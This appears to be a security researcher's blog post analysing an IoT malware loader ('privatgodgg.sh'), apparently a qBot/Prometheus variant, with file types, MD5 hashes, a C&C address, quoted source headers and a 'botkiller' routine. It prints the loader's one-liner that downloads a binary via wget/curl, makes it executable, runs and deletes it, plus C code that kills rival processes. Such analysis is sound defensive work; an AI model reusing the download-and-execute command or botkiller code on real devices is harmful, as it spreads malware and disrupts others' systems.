A new IoT malware loader: ”privatgodgg.sh”

A new IoT malware loader: ”privatgodgg.sh”

As usual, it targets ARM-based devices and it tries to download other files (privntpd1, privsshd1, privopenssh1, privbash1, privtftp1, privwget1 etc) via curl or wget (whichever is available on the infected devices).

As usual, we suspect this loader to be injected via unauthenticated telnet/hard-coded credentials – although it could be a RCE, but we haven’t found indications about that.

As soon as it finishes downloading the file, the loader changes it’s mode to executable (chmod +x privntpd1), runs it and then deletes it – making us suspect that this is another one that resides in the memory – probably until a reboot/reset.

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://{SOMEIP}/privcron1; curl -O http://{SOMEIP}/privcron1; chmod +x privcron1; ./privcron1; rm -rf privcron1

The priv* files that it downloads target several architectures including Intel PCs(x86/x64):

privapache21: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
privbash1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
privcron1: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
privftp1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
privntpd1: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
privnut1: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
privopenssh1: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
privpftp1: ELF 32-bit MSB executable, Motorola 68020, version 1 (SYSV), statically linked, not stripped
privsh1: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, not stripped
privsshd1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
privtftp1: ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, not stripped
privwget1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped

MD5:

bd52d96a2646c27ff578c9e386194c06 privapache21
fcae6f9865ccac9e017b662a03bb75e4 privatgodgg.sh
249516d6474ad15af5f66ae060517e88 privbash1
18380f4582c90a3ed6456bae480af7e1 privcron1
aaab902c9a346d7e92fe2df6053e9034 privftp1
2590f61ecb53d5b0dc8d5d3c38a47430 privntpd1
5dfabb95131f845b6a525865c73d5a03 privnut1
ee1cd2ee7292a0849b00438e7fd04b73 privopenssh1
1301bf22e80926ba6c6fc2a0f961a0a6 privpftp1
3a922d0203abd12cb87fac752a8456fd privsh1
b1a1474f1d8069fa3faf6a5fe99335a6 privsshd1
3eac59126a9cc85c1b66d0bc7b113104 privtftp1
5053e83937be0c2d72317278e097dfb9 privwget1

Due to the fact that it uses the string ”/tmp/yuagwduiagwdhg/a” inside it, we think it’s another strain of qBot – or Prometheus.

Also, in it’s sources (that we later aquired) we could identify the following header:

/*
   This was given to someone I considered as a good friend :/
   Its was being sold under my nose
   This was given to a friend out of a token of my graditude since he
   wanted to fuck over well ill just post here
   Shit dont work #StankyMalware #MalwareMustDie #StopHacking2017
*/

,

/*
                  This is the official build of PROMETHEUS
                                     ___________
                                    //LEAKED M8\\
                                    \\THIS REPS//
                                     \\_______//
                  Yeah thats right this shit reps you gone be a big
                               Goat Greper like cheats
                  Just a lil credz to all the peeps that made this possible
                                        B1NARY
                                        ZONEHAX
                                        CHEATS
                                  Thanks to them this
                                  bot is as dank as it
                                  is XD this is the main
                                  build if you have this
                                  means you're an OG.

                                V4 OFFICIAL FINAL BUILD
                                         Contains Multi-Threaded HTTP ATTACK
                                                        Thanks for buying enjoy big boat reps
                                                        This was the offical final real build
                                                        of Prometheus the one that's "leaked"
                                                        was the one I was selling this is the
                                                        real one that I only sold to 3 people
*/

and a CNC server that resides at

unsigned char *commServer[] ={"89.34.99.131:23"}; // [N.B. not available at this time]

Interesting enough, as the guys at Imperva – Incapsula have already found out in a MIRAI variant, this one doesn’t like other bots too:

const char *knownBots[] = {
	"mips",
	"mipsel",
	"sh4",
	"x86",
	"i686",
	"ppc",
	"i586",
	"i586",
	"jackmy*",
	"hackmy*",
	"arm*",
	"b1",
	"b2",
	"b3",
	"b4",
	"b5",
	"b6",
	"b7",
	"b8",
	"b9",
	"busyboxterrorist",
	"DFhxdhdf",
	"dvrHelper",
	"FDFDHFC",
	"FEUB",
	"FTUdftui",
	"GHfjfgvj",
	"jhUOH",
	"JIPJIPJj",
	"JIPJuipjh",
	"kmyx86_64",
	"lolmipsel",
	"mips",
	"mipsel",
	"RYrydry",
	"tel*",
	"TwoFace*",
	"UYyuyioy",
	"wget",
	"x86_64",
	"XDzdfxzf",
	"xxb*",
	"sh",
	"1",
	"2",
	"3",
	"4",
	"5",
	"6",
	"7",
	"8",
	"9",
	"10",
	"11",	
	"12",
	"13",
	"14",
	"15",
	"16",
	"17",
	"18",
	"19",
	"20",
	"hackz",
	"bin*",
	"gtop",
	"ftp*",
	"tftp*",
	"botnet",
	"swatnet",
	"ballpit",
	"fucknet",
	"cracknet",
	"weednet",
	"gaynet",
	"queernet",
	"ballnet",
	"unet",
	"yougay",
	"sttftp",
	"sstftp",
	"sbtftp",
	"btftp",
	"y0u1sg3y",
	"bruv*",
	"IoT*",
};
[...]
void botkiller(){
	int i;
	while(1){
		for(i = 0; i < 9; i++){
			char command[80];
			sprintf(command, "pkill -9 ");
			strcat(command, knownBots[i]);
			system(command);
			sprintf(command, "pkill -9 \"");
			strcat(command, knownBots[i]);
			strcat(command, "\"");
			system(command);
		}
		sleep(5);
	}
}

Although we are not sure that the author really knows what he targets with the void botkiller() subroutine.

[probably more to come...]

Vastaa

Sähköpostiosoitettasi ei julkaista. Pakolliset kentät on merkitty *